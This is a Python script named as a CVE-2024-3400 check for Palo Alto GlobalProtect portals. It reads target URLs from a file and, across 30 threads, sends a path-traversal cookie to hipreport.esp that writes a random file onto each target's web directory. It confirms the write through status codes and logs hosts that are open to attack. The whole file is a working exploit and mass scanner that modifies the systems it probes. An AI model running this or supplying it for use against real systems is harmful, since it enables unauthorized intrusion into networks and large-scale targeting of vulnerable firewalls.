CVE-2024-3400-check.py

import random
import string
from concurrent.futures import ThreadPoolExecutor
import urllib3
import requests

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
resFile = open("resFile.txt", "w")

def GenerateRandomString(length):
    characters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(characters) for _ in range(length))

def CheckFile(url, proxy, filename):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp1 = requests.get(url=url + f"/global-protect/portal/images/{filename}.txt", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    resp2 = requests.get(url=url + f"/global-protect/portal/images/{filename}_cve_test.txt", headers=headers, proxies=proxy,
                         verify=False, allow_redirects=False, timeout=10)
    if resp1.status_code == 403 and resp2.status_code == 404:
        return True
    else:
        return False

def CreateFile(url, proxy):
    filename = GenerateRandomString(10)
    headers = {
        "Cookie": f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename}.txt;",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    if resp.status_code == 200:
        if CheckFile(url, proxy, filename):
            print(f"[+] {url}")
            resFile.write(f"{url}\n")


def GetUrls():
    with open("urls.txt","r") as f:
        for address in f.readlines():
            address = address.strip()
            yield address

if __name__ == "__main__":
    # proxy = {
    #     "http": "http://127.0.0.1:8080",
    #     "https": "http://127.0.0.1:8080"
    # }
    proxy = {}
    addrs = GetUrls()
    max_thread_num = 30
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    for addr in addrs:
        future = executor.submit(CreateFile, addr, proxy)